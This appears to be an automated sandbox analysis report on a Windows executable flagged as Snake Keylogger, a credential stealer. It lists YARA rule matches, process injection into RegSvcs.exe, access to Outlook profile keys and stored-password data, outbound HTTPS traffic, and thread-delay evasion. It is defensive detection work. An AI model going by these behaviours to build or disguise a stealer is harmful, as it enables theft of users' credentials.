                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49735 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDA0882_2_00FDA088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDC1472_2_00FDC147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDD2782_2_00FDD278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD53702_2_00FD5370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDC4682_2_00FDC468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDC7382_2_00FDC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD69A02_2_00FD69A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDE9882_2_00FDE988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDCA082_2_00FDCA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDCCD82_2_00FDCCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD6FC82_2_00FD6FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDCFA92_2_00FDCFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD29E02_2_00FD29E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDE97B2_2_00FDE97B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FDF9612_2_00FDF961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD3E092_2_00FD3E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BDE002_2_061BDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B1E802_2_061B1E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B17A02_2_061B17A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B9C702_2_061B9C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BFC682_2_061BFC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B95482_2_061B9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B0B302_2_061B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B50282_2_061B5028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B29682_2_061B2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B1E702_2_061B1E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BE6B02_2_061BE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BE6AF2_2_061BE6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BEF512_2_061BEF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BEF602_2_061BEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B178F2_2_061B178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BCCA02_2_061BCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BD5502_2_061BD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BD5402_2_061BD540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BDDFF2_2_061BDDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BE2582_2_061BE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BE24A2_2_061BE24A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BEAF82_2_061BEAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BEB082_2_061BEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B93282_2_061B9328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B0B202_2_061B0B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B8B912_2_061B8B91
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BF3B82_2_061BF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B8BA02_2_061B8BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B9BFA2_2_061B9BFA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BF8102_2_061BF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BF8022_2_061BF802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B00062_2_061B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B50222_2_061B5022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B00402_2_061B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BD0F82_2_061BD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B295A2_2_061B295A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BD9992_2_061BD999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061BD9A82_2_061BD9A8
                    Source: 7DI4iYwcvw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeFile created: C:\Users\user\AppData\Local\Temp\juvenilelyJump to behavior
                    Source: 7DI4iYwcvw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.0000000002A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 7DI4iYwcvw.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeFile read: C:\Users\user\Desktop\7DI4iYwcvw.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\7DI4iYwcvw.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: 7DI4iYwcvw.exeStatic file information: File size 1257083 > 1048576
                    Source: 7DI4iYwcvw.exeStatic PE information: real checksum: 0xa961f should be: 0x13c5fa
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD9C30 push esp; retf 0271h2_2_00FD9D55
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FD891E pushad ; iretd 2_2_00FD891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B9243 push es; ret 2_2_061B9244
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeAPI/Special instruction interceptor: Address: 403A264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596639Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8138Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1715Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
